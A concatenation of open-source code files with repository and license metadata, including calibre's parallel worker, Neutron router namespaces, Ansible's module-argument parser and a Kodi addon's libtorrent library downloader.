('calibre.gui2.convert.gui_conversion', 'gui_convert', 'notification'),
'gui_polish' :
('calibre.ebooks.oeb.polish.main', 'gui_polish', None),
'gui_convert_override' :
('calibre.gui2.convert.gui_conversion', 'gui_convert_override', 'notification'),
'gui_catalog' :
('calibre.gui2.convert.gui_conversion', 'gui_catalog', 'notification'),
'move_library' :
('calibre.library.move', 'move_library', 'notification'),
'arbitrary' :
('calibre.utils.ipc.worker', 'arbitrary', None),
'arbitrary_n' :
('calibre.utils.ipc.worker', 'arbitrary_n', 'notification'),
}
class Progress(Thread):
def __init__(self, conn):
Thread.__init__(self)
self.daemon = True
self.conn = conn
self.queue = Queue()
def __call__(self, percent, msg=''):
self.queue.put((percent, msg))
def run(self):
while True:
x = self.queue.get()
if x is None:
break
try:
eintr_retry_call(self.conn.send, x)
except:
break
def arbitrary(module_name, func_name, args, kwargs={}):
'''
An entry point that allows arbitrary functions to be run in a parallel
process. useful for plugin developers that want to run jobs in a parallel
process.
To use this entry point, simply create a ParallelJob with the module and
function names for the real entry point.
Remember that args and kwargs must be serialized so only use basic types
for them.
To use this, you will do something like
from calibre.gui2 import Dispatcher
gui.job_manager.run_job(Dispatcher(job_done), 'arbitrary',
args=('calibre_plugins.myplugin.worker', 'do_work',
('arg1' 'arg2', 'arg3')),
description='Change the world')
The function job_done will be called on completion, see the code in
gui2.actions.catalog for an example of using run_job and Dispatcher.
:param module_name: The fully qualified name of the module that contains
the actual function to be run. For example:
calibre_plugins.myplugin.worker
:param func_name: The name of the function to be run.
:param name: A list (or tuple) of arguments that will be passed to the
function ``func_name``
:param kwargs: A dictionary of keyword arguments to pass to func_name
'''
if module_name.startswith('calibre_plugins'):
# Initialize the plugin loader by doing this dummy import
from calibre.customize.ui import find_plugin
find_plugin
module = importlib.import_module(module_name)
func = getattr(module, func_name)
return func(*args, **kwargs)
def arbitrary_n(module_name, func_name, args, kwargs={},
notification=lambda x, y: y):
'''
Same as :func:`arbitrary` above, except that func_name must support a
keyword argument "notification". This will be a function that accepts two
arguments. func_name should call it periodically with progress information.
The first argument is a float between 0 and 1 that represent percent
completed and the second is a string with a message (it can be an empty
string).
'''
if module_name.startswith('calibre_plugins'):
# Initialize the plugin loader by doing this dummy import
from calibre.customize.ui import find_plugin
find_plugin
module = importlib.import_module(module_name)
func = getattr(module, func_name)
kwargs['notification'] = notification
return func(*args, **kwargs)
def get_func(name):
module, func, notification = PARALLEL_FUNCS[name]
try:
module = importlib.import_module(module)
except ZipImportError:
# Something windows weird happened, try clearing the zip import cache
# incase the zipfile was changed from under us
from zipimport import _zip_directory_cache as zdc
zdc.clear()
module = importlib.import_module(module)
func = getattr(module, func)
return func, notification
def main():
if iswindows:
if '--multiprocessing-fork' in sys.argv:
# We are using the multiprocessing module on windows to launch a
# worker process
from multiprocessing import freeze_support
freeze_support()
return 0
# Close open file descriptors inherited from parent
# On Unix this is done by the subprocess module
os.closerange(3, 256)
if isosx and 'CALIBRE_WORKER_ADDRESS' not in os.environ and '--pipe-worker' not in sys.argv:
# On some OS X computers launchd apparently tries to
# launch the last run process from the bundle
# so launch the gui as usual
from calibre.gui2.main import main as gui_main
return gui_main(['calibre'])
csw = os.environ.get('CALIBRE_SIMPLE_WORKER', None)
if csw:
mod, _, func = csw.partition(':')
mod = importlib.import_module(mod)
func = getattr(mod, func)
func()
return
if '--pipe-worker' in sys.argv:
try:
exec (sys.argv[-1])
except Exception:
print 'Failed to run pipe worker with command:', sys.argv[-1]
raise
return
address = cPickle.loads(unhexlify(os.environ['CALIBRE_WORKER_ADDRESS']))
key = unhexlify(os.environ['CALIBRE_WORKER_KEY'])
resultf = unhexlify(os.environ['CALIBRE_WORKER_RESULT']).decode('utf-8')
with closing(Client(address, authkey=key)) as conn:
name, args, kwargs, desc = eintr_retry_call(conn.recv)
if desc:
prints(desc)
sys.stdout.flush()
func, notification = get_func(name)
notifier = Progress(conn)
if notification:
kwargs[notification] = notifier
notifier.start()
result = func(*args, **kwargs)
if result is not None and os.path.exists(os.path.dirname(resultf)):
cPickle.dump(result, open(resultf, 'wb'), -1)
notifier.queue.put(None)
try:
sys.stdout.flush()
except EnvironmentError:
pass # Happens sometimes on OS X for GUI processes (EPIPE)
try:
sys.stderr.flush()
except EnvironmentError:
pass # Happens sometimes on OS X for GUI processes (EPIPE)
return 0
if __name__ == '__main__':
sys.exit(main())
|
gpl-3.0
|
houst0nn/external_skia
|
tools/reformat-json.py
|
208
|
1741
|
#!/usr/bin/python
'''
Copyright 2013 Google Inc.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.
'''
'''
Rewrites a JSON file to use Python's standard JSON pretty-print format,
so that subsequent runs of rebaseline.py will generate useful diffs
(only the actual checksum differences will show up as diffs, not obscured
by format differences).
Should not modify the JSON contents in any meaningful way.
'''
# System-level imports
import argparse
import os
import sys
# Imports from within Skia
#
# We need to add the 'gm' directory, so that we can import gm_json.py within
# that directory. That script allows us to parse the actual-results.json file
# written out by the GM tool.
# Make sure that the 'gm' dir is in the PYTHONPATH, but add it at the *end*
# so any dirs that are already in the PYTHONPATH will be preferred.
#
# This assumes that the 'gm' directory has been checked out as a sibling of
# the 'tools' directory containing this script, which will be the case if
# 'trunk' was checked out as a single unit.
GM_DIRECTORY = os.path.realpath(
os.path.join(os.path.dirname(os.path.dirname(__file__)), 'gm'))
if GM_DIRECTORY not in sys.path:
sys.path.append(GM_DIRECTORY)
import gm_json
def Reformat(filename):
print 'Reformatting file %s...' % filename
gm_json.WriteToFile(gm_json.LoadFromFile(filename), filename)
def _Main():
parser = argparse.ArgumentParser(description='Reformat JSON files in-place.')
parser.add_argument('filenames', metavar='FILENAME', nargs='+',
help='file to reformat')
args = parser.parse_args()
for filename in args.filenames:
Reformat(filename)
sys.exit(0)
if __name__ == '__main__':
_Main()
|
bsd-3-clause
|
waltBB/neutron_read
|
neutron/agent/l3/namespaces.py
|
6
|
3002
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from oslo_log import log as logging
from neutron.agent.linux import ip_lib
from neutron.i18n import _LE
LOG = logging.getLogger(__name__)
NS_PREFIX = 'qrouter-'
INTERNAL_DEV_PREFIX = 'qr-'
EXTERNAL_DEV_PREFIX = 'qg-'
# TODO(Carl) It is odd that this file needs this. It is a dvr detail.
ROUTER_2_FIP_DEV_PREFIX = 'rfp-'
class Namespace(object):
def __init__(self, name, agent_conf, driver, use_ipv6):
self.name = name
self.ip_wrapper_root = ip_lib.IPWrapper()
self.agent_conf = agent_conf
self.driver = driver
self.use_ipv6 = use_ipv6
def create(self):
ip_wrapper = self.ip_wrapper_root.ensure_namespace(self.name)
cmd = ['sysctl', '-w', 'net.ipv4.ip_forward=1']
ip_wrapper.netns.execute(cmd)
if self.use_ipv6:
cmd = ['sysctl', '-w', 'net.ipv6.conf.all.forwarding=1']
ip_wrapper.netns.execute(cmd)
def delete(self):
if self.agent_conf.router_delete_namespaces:
try:
self.ip_wrapper_root.netns.delete(self.name)
except RuntimeError:
msg = _LE('Failed trying to delete namespace: %s')
LOG.exception(msg, self.name)
class RouterNamespace(Namespace):
def __init__(self, router_id, agent_conf, driver, use_ipv6):
self.router_id = router_id
name = self._get_ns_name(router_id)
super(RouterNamespace, self).__init__(
name, agent_conf, driver, use_ipv6)
@staticmethod
def _get_ns_name(router_id):
return (NS_PREFIX + router_id)
def delete(self):
ns_ip = ip_lib.IPWrapper(namespace=self.name)
for d in ns_ip.get_devices(exclude_loopback=True):
if d.name.startswith(INTERNAL_DEV_PREFIX):
# device is on default bridge
self.driver.unplug(d.name, namespace=self.name,
prefix=INTERNAL_DEV_PREFIX)
elif d.name.startswith(ROUTER_2_FIP_DEV_PREFIX):
ns_ip.del_veth(d.name)
elif d.name.startswith(EXTERNAL_DEV_PREFIX):
self.driver.unplug(
d.name,
bridge=self.agent_conf.external_network_bridge,
namespace=self.name,
prefix=EXTERNAL_DEV_PREFIX)
super(RouterNamespace, self).delete()
|
apache-2.0
|
hickford/cython
|
tests/run/pyclass_scope_T671.py
|
28
|
1624
|
# mode: run
# ticket: 671
A = 1234
class SimpleAssignment(object):
"""
>>> SimpleAssignment.A
1234
"""
A = A
class SimpleRewrite(object):
"""
>>> SimpleRewrite.A
4321
"""
A = 4321
A = A
def simple_inner(a):
"""
>>> simple_inner(4321).A
1234
"""
A = a
class X(object):
A = A
return X
def conditional(a, cond):
"""
>>> conditional(4321, False).A
1234
>>> conditional(4321, True).A
4321
"""
class X(object):
if cond:
A = a
A = A
return X
def name_error():
"""
>>> name_error() #doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...B...
"""
class X(object):
B = B
def conditional_name_error(cond):
"""
>>> conditional_name_error(True).B
4321
>>> conditional_name_error(False).B #doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...B...
"""
class X(object):
if cond:
B = 4321
B = B
return X
C = 1111
del C
def name_error_deleted():
"""
>>> name_error_deleted() #doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ...C...
"""
class X(object):
C = C
_set = set
def name_lookup_order():
"""
>>> Scope = name_lookup_order()
>>> Scope().set(2)
42
>>> Scope.test1 == _set()
True
>>> Scope.test2 == _set()
True
"""
class Scope(object):
test1 = set()
test2 = set()
def set(self, x):
return 42
return Scope
|
apache-2.0
|
aparo/django-nonrel
|
django/contrib/gis/tests/distapp/models.py
|
406
|
1832
|
from django.contrib.gis.db import models
class SouthTexasCity(models.Model):
"City model on projected coordinate system for South Texas."
name = models.CharField(max_length=30)
point = models.PointField(srid=32140)
objects = models.GeoManager()
def __unicode__(self): return self.name
class SouthTexasCityFt(models.Model):
"Same City model as above, but U.S. survey feet are the units."
name = models.CharField(max_length=30)
point = models.PointField(srid=2278)
objects = models.GeoManager()
def __unicode__(self): return self.name
class AustraliaCity(models.Model):
"City model for Australia, using WGS84."
name = models.CharField(max_length=30)
point = models.PointField()
objects = models.GeoManager()
def __unicode__(self): return self.name
class CensusZipcode(models.Model):
"Model for a few South Texas ZIP codes (in original Census NAD83)."
name = models.CharField(max_length=5)
poly = models.PolygonField(srid=4269)
objects = models.GeoManager()
def __unicode__(self): return self.name
class SouthTexasZipcode(models.Model):
"Model for a few South Texas ZIP codes."
name = models.CharField(max_length=5)
poly = models.PolygonField(srid=32140, null=True)
objects = models.GeoManager()
def __unicode__(self): return self.name
class Interstate(models.Model):
"Geodetic model for U.S. Interstates."
name = models.CharField(max_length=10)
path = models.LineStringField()
objects = models.GeoManager()
def __unicode__(self): return self.name
class SouthTexasInterstate(models.Model):
"Projected model for South Texas Interstates."
name = models.CharField(max_length=10)
path = models.LineStringField(srid=32140)
objects = models.GeoManager()
def __unicode__(self): return self.name
|
bsd-3-clause
|
alfa-addon/addon
|
plugin.video.alfa/lib/python_libtorrent/python_libtorrent/functions.py
|
1
|
10908
|
#-*- coding: utf-8 -*-
'''
python-libtorrent for Kodi (script.module.libtorrent)
Copyright (C) 2015-2016 DiMartino, srg70, RussakHH, aisman
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
from __future__ import absolute_import
from builtins import object
import sys
PY3 = False
if sys.version_info[0] >= 3: PY3 = True; unicode = str; unichr = chr; long = int
import time
import xbmc, xbmcgui, xbmcaddon
from .net import HTTP
from core import filetools ### Alfa
from core import ziptools
from platformcode import config ### Alfa
#__libbaseurl__ = "https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
#__settings__ = xbmcaddon.Addon(id='script.module.libtorrent')
#__version__ = __settings__.getAddonInfo('version')
#__plugin__ = __settings__.getAddonInfo('name') + " v." + __version__
#__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
# 'script.module.libtorrent', 'icon.png')
#__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
__version__ = '2.0.2' ### Alfa
__plugin__ = "python-libtorrent v.2.0.2" ### Alfa
__icon__= filetools.join(filetools.translatePath('special://home'), 'addons',
'plugin.video.alfa', 'icon.png') ### Alfa
#__language__ = __settings__.getLocalizedString ### Alfa
#from python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
from lib.python_libtorrent.python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa
def log(msg):
if PY3:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGINFO )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGINFO )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGINFO )
else:
try:
xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGNOTICE )
except UnicodeEncodeError:
xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGNOTICE )
except:
xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGNOTICE )
def getSettingAsBool(setting):
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
return __settings__.getSetting(setting).lower() == "true"
class LibraryManager(object):
def __init__(self, dest_path, platform):
self.dest_path = dest_path
self.platform = platform
self.root=filetools.dirname(filetools.dirname(__file__))
ver1, ver2, ver3 = platform['version'].split('.') ### Alfa: resto método
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
def check_exist(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
for libname in get_libname(self.platform):
if not filetools.exists(filetools.join(self.dest_path, libname)):
return False
return True
def check_update(self):
need_update=False
for libname in get_libname(self.platform):
if libname!='liblibtorrent.so':
self.libpath = filetools.join(self.dest_path, libname)
self.sizepath=filetools.join(self.root, self.platform['system'], self.platform['version'], libname+'.size.txt')
size=str(filetools.getsize(self.libpath))
size_old=open( self.sizepath, "r" ).read()
if size_old!=size:
need_update=True
return need_update
def update(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
if self.check_update():
for libname in get_libname(self.platform):
self.libpath = filetools.join(self.dest_path, libname)
filetools.remove(self.libpath)
self.download()
def download(self, dest_path='', platform=''):
if dest_path: self.dest_path = dest_path
if platform: self.platform = platform
ver1, ver2, ver3 = platform['version'].split('.') ### Alfa: resto método
try:
ver1 = int(ver1)
ver2 = int(ver2)
except:
ver1 = 2
ver2 = 0
if ver1 > 1 or (ver1 == 1 and ver2 >= 2):
global __libbaseurl__
__libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \
'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent']
else:
__libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"]
__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa
filetools.mkdir(self.dest_path)
for libname in get_libname(self.platform):
p_version = self.platform['version']
if PY3: p_version += '_PY3'
dest = filetools.join(self.dest_path, libname)
log("try to fetch %s/%s/%s" % (self.platform['system'], p_version, libname))
for url_lib in __libbaseurl__: ### Alfa
url = "%s/%s/%s/%s.zip" % (url_lib, self.platform['system'], p_version, libname)
url_size = "%s/%s/%s/%s.size.txt" % (url_lib, self.platform['system'], p_version, libname)
if libname!='liblibtorrent.so':
try:
self.http = HTTP()
response = self.http.fetch(url, download=dest + ".zip", progress=False) ### Alfa
log("%s -> %s" % (url, dest))
if response.code != 200: continue ### Alfa
response = self.http.fetch(url_size, download=dest + '.size.txt', progress=False) ### Alfa
log("%s -> %s" % (url_size, dest + '.size.txt'))
if response.code != 200: continue ### Alfa
try:
unzipper = ziptools.ziptools()
unzipper.extract("%s.zip" % dest, self.dest_path)
except:
xbmc.executebuiltin('Extract("%s.zip","%s")' % (dest, self.dest_path))
time.sleep(1)
if filetools.exists(dest):
filetools.remove(dest + ".zip")
except:
import traceback
text = 'Failed download %s!' % libname
log(text)
log(traceback.format_exc(1))
#xbmc.executebuiltin("Notification(%s,%s,%s,%s)" % (__plugin__,text,750,__icon__))
continue
else:
filetools.copy(filetools.join(self.dest_path, 'libtorrent.so'), dest, silent=True) ### Alfa
#dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Path')), \
# 'lib', libname) ### Alfa
#filetools.copy(dest, dest_alfa, silent=True) ### Alfa
dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Profile')), \
'bin', libname) ### Alfa
filetools.remove(dest_alfa, silent=True)
filetools.copy(dest, dest_alfa, silent=True) ### Alfa
break
else:
return False
return True
def android_workaround(self, new_dest_path): ### Alfa (entera)
for libname in get_libname(self.platform):
libpath = filetools.join(self.dest_path, libname)
size = str(filetools.getsize(libpath))
new_libpath = filetools.join(new_dest_path, libname)
if filetools.exists(new_libpath):
new_size = str(filetools.getsize(new_libpath))
if size != new_size:
res = filetools.remove(new_libpath, su=True)
if res:
log('Deleted: (%s) %s -> (%s) %s' %(size, libpath, new_size, new_libpath))
if not filetools.exists(new_libpath):
res = filetools.copy(libpath, new_libpath, ch_mod='777', su=True) ### ALFA
else:
log('Module exists. Not copied... %s' % new_libpath) ### ALFA
return new_dest_path
|
gpl-3.0
|
Sorsly/subtle
|
google-cloud-sdk/lib/surface/compute/instances/suspend.py
|
3
|
2970
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for suspending an instance."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags
from googlecloudsdk.command_lib.compute.instances import flags as instance_flags
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class Suspend(base_classes.NoOutputAsyncMutator):
"""Suspend a virtual machine instance.
*{command}* is used to suspend a running Google Compute Engine virtual
machine. Only a running virtual machine can be suspended.
"""
@staticmethod
def Args(parser):
instance_flags.INSTANCES_ARG.AddArgument(parser)
parser.add_argument(
'--discard-local-ssd',
action='store_true',
help=('If provided, local SSD data is discarded.'))
# TODO(user): consider adding detailed help.
@property
def service(self):
return self.compute.instances
@property
def method(self):
return 'Suspend'
@property
def resource_type(self):
return 'instances'
def _CreateSuspendRequest(self, instance_ref, discard_local_ssd):
return self.messages.ComputeInstancesSuspendRequest(
discardLocalSsd=discard_local_ssd,
instance=instance_ref.Name(),
project=self.project,
zone=instance_ref.zone)
def CreateRequests(self, args):
instance_refs = instance_flags.INSTANCES_ARG.ResolveAsResource(
args, self.resources, scope_lister=flags.GetDefaultScopeLister(
self.compute_client, self.project))
return [self._CreateSuspendRequest(instance_ref, args.discard_local_ssd)
for instance_ref in instance_refs]
Suspend.detailed_help = {
'brief': 'Suspend a virtual machine instance',
'DESCRIPTION': """\
*{command}* is used to suspend a Google Compute Engine virtual machine.
Suspending a VM is the equivalent of sleep or standby mode:
the guest receives an ACPI S3 suspend signal, after which all VM state
is saved to temporary storage. An instance can only be suspended while
it is in the RUNNING state. A suspended instance will be put in
SUSPENDED state.
Alpha restrictions: Suspending a Preemptible VM is not supported and
will result in an API error. Suspending a VM that is using CSEK or GPUs
is not supported and will result in an API error.
""",
}
|
mit
|
h4ck3rm1k3/ansible
|
v2/ansible/parsing/mod_args.py
|
1
|
10144
|
# (c) 2014 Michael DeHaan, <michael@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import iteritems, string_types
from types import NoneType
from ansible.errors import AnsibleParserError
from ansible.plugins import module_loader
from ansible.parsing.splitter import parse_kv
class ModuleArgsParser:
"""
There are several ways a module and argument set can be expressed:
# legacy form (for a shell command)
- action: shell echo hi
# common shorthand for local actions vs delegate_to
- local_action: shell echo hi
# most commonly:
- copy: src=a dest=b
# legacy form
- action: copy src=a dest=b
# complex args form, for passing structured data
- copy:
src: a
dest: b
# gross, but technically legal
- action:
module: copy
args:
src: a
dest: b
# extra gross, but also legal. in this case, the args specified
# will act as 'defaults' and will be overriden by any args specified
# in one of the other formats (complex args under the action, or
# parsed from the k=v string
- command: 'pwd'
args:
chdir: '/tmp'
This class has some of the logic to canonicalize these into the form
- module: <module_name>
delegate_to: <optional>
args: <args>
Args may also be munged for certain shell command parameters.
"""
def __init__(self, task_ds=dict()):
assert isinstance(task_ds, dict)
self._task_ds = task_ds
def _split_module_string(self, str):
'''
when module names are expressed like:
action: copy src=a dest=b
the first part of the string is the name of the module
and the rest are strings pertaining to the arguments.
'''
tokens = str.split()
if len(tokens) > 1:
return (tokens[0], " ".join(tokens[1:]))
else:
return (tokens[0], "")
def _handle_shell_weirdness(self, action, args):
'''
given an action name and an args dictionary, return the
proper action name and args dictionary. This mostly is due
to shell/command being treated special and nothing else
'''
# don't handle non shell/command modules in this function
# TODO: in terms of the whole app, should 'raw' also fit here?
if action not in ['shell', 'command']:
return (action, args)
# the shell module really is the command module with an additional
# parameter
if action == 'shell':
action = 'command'
args['_uses_shell'] = True
return (action, args)
def _normalize_parameters(self, thing, action=None, additional_args=dict()):
'''
arguments can be fuzzy. Deal with all the forms.
'''
# final args are the ones we'll eventually return, so first update
# them with any additional args specified, which have lower priority
# than those which may be parsed/normalized next
final_args = dict()
if additional_args:
final_args.update(additional_args)
# how we normalize depends if we figured out what the module name is
# yet. If we have already figured it out, it's an 'old style' invocation.
# otherwise, it's not
if action is not None:
args = self._normalize_old_style_args(thing, action)
else:
(action, args) = self._normalize_new_style_args(thing)
# this can occasionally happen, simplify
if args and 'args' in args:
args = args['args']
# finally, update the args we're going to return with the ones
# which were normalized above
if args:
final_args.update(args)
return (action, final_args)
def _normalize_old_style_args(self, thing, action):
'''
deals with fuzziness in old-style (action/local_action) module invocations
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'local_action' : 'shell echo hi' }
{ 'action' : 'shell echo hi' }
{ 'local_action' : { 'module' : 'ec2', 'x' : 1, 'y': 2 }}
standardized outputs like:
( 'command', { _raw_params: 'echo hi', _uses_shell: True }
'''
if isinstance(thing, dict):
# form is like: local_action: { module: 'xyz', x: 2, y: 3 } ... uncommon!
args = thing
elif isinstance(thing, string_types):
# form is like: local_action: copy src=a dest=b ... pretty common
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(thing, check_raw=check_raw)
elif isinstance(thing, NoneType):
# this can happen with modules which take no params, like ping:
args = None
else:
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return args
def _normalize_new_style_args(self, thing):
'''
deals with fuzziness in new style module invocations
accepting key=value pairs and dictionaries, and always returning dictionaries
returns tuple of (module_name, dictionary_args)
possible example inputs:
{ 'shell' : 'echo hi' }
{ 'ec2' : { 'region' : 'xyz' }
{ 'ec2' : 'region=xyz' }
standardized outputs like:
('ec2', { region: 'xyz'} )
'''
action = None
args = None
if isinstance(thing, dict):
# form is like: copy: { src: 'a', dest: 'b' } ... common for structured (aka "complex") args
thing = thing.copy()
if 'module' in thing:
action = thing['module']
args = thing.copy()
del args['module']
elif isinstance(thing, string_types):
# form is like: copy: src=a dest=b ... common shorthand throughout ansible
(action, args) = self._split_module_string(thing)
check_raw = action in ('command', 'shell', 'script')
args = parse_kv(args, check_raw=check_raw)
else:
# need a dict or a string, so giving up
raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds)
return (action, args)
def parse(self):
'''
Given a task in one of the supported forms, parses and returns
returns the action, arguments, and delegate_to values for the
task, dealing with all sorts of levels of fuzziness.
'''
thing = None
action = None
delegate_to = None
args = dict()
#
# We can have one of action, local_action, or module specified
#
# this is the 'extra gross' scenario detailed above, so we grab
# the args and pass them in as additional arguments, which can/will
# be overwritten via dict updates from the other arg sources below
# FIXME: add test cases for this
additional_args = self._task_ds.get('args', dict())
# action
if 'action' in self._task_ds:
# an old school 'action' statement
thing = self._task_ds['action']
delegate_to = None
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# local_action
if 'local_action' in self._task_ds:
# local_action is similar but also implies a delegate_to
if action is not None:
raise AnsibleParserError("action and local_action are mutually exclusive", obj=self._task_ds)
thing = self._task_ds.get('local_action', '')
delegate_to = 'localhost'
action, args = self._normalize_parameters(thing, additional_args=additional_args)
# module: <stuff> is the more new-style invocation
# walk the input dictionary to see we recognize a module name
for (item, value) in iteritems(self._task_ds):
if item in module_loader or item == 'meta':
# finding more than one module name is a problem
if action is not None:
raise AnsibleParserError("conflicting action statements", obj=self._task_ds)
action = item
thing = value
action, args = self._normalize_parameters(value, action=action, additional_args=additional_args)
# if we didn't see any module in the task at all, it's not a task really
if action is None:
raise AnsibleParserError("no action detected in task", obj=self._task_ds)
# FIXME: disabled for now, as there are other places besides the shell/script modules where
# having variables as the sole param for the module is valid (include_vars, add_host, and group_by?)
#elif args.get('_raw_params', '') != '' and action not in ('command', 'shell', 'script', 'include_vars'):
# raise AnsibleParserError("this task has extra params, which is only allowed in the command, shell or script module.", obj=self._task_ds)
# shell modules require special handling
(action, args) = self._handle_shell_weirdness(action, args)
return (action, args, delegate_to)
|
gpl-3.0
|
konstruktoid/ansible-upstream
|
lib/ansible/modules/messaging/rabbitmq_queue.py
|
23
|
9734
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Manuel Sousa <manuel.sousa@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rabbitmq_queue
author: "Manuel Sousa (@manuel-sousa)"
version_added: "2.0"
short_description: This module manages rabbitMQ queues
description:
- This module uses rabbitMQ Rest API to create/delete queues
requirements: [ "requests >= 1.0.0" ]
options:
name:
description:
- Name of the queue to create
required: true
state:
description:
- Whether the queue should be present or absent
- Only present implemented atm
choices: [ "present", "absent" ]
default: present
login_user:
description:
- rabbitMQ user for connection
default: guest
login_password:
description:
- rabbitMQ password for connection
type: bool
default: 'no'
login_host:
description:
- rabbitMQ host for connection
default: localhost
login_port:
description:
- rabbitMQ management api port
default: 15672
vhost:
description:
- rabbitMQ virtual host
default: "/"
durable:
description:
- whether queue is durable or not
type: bool
default: 'yes'
auto_delete:
description:
- if the queue should delete itself after all queues/queues unbound from it
type: bool
default: 'no'
message_ttl:
description:
- How long a message can live in queue before it is discarded (milliseconds)
default: forever
auto_expires:
description:
- How long a queue can be unused before it is automatically deleted (milliseconds)
default: forever
max_length:
description:
- How many messages can the queue contain before it starts rejecting
default: no limit
dead_letter_exchange:
description:
- Optional name of an exchange to which messages will be republished if they
- are rejected or expire
dead_letter_routing_key:
description:
- Optional replacement routing key to use when a message is dead-lettered.
- Original routing key will be used if unset
max_priority:
description:
- Maximum number of priority levels for the queue to support.
- If not set, the queue will not support message priorities.
- Larger numbers indicate higher priority.
version_added: "2.4"
arguments:
description:
- extra arguments for queue. If defined this argument is a key/value dictionary
default: {}
'''
EXAMPLES = '''
# Create a queue
- rabbitmq_queue:
name: myQueue
# Create a queue on remote host
- rabbitmq_queue:
name: myRemoteQueue
login_user: user
login_password: secret
login_host: remote.example.org
'''
import json
try:
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
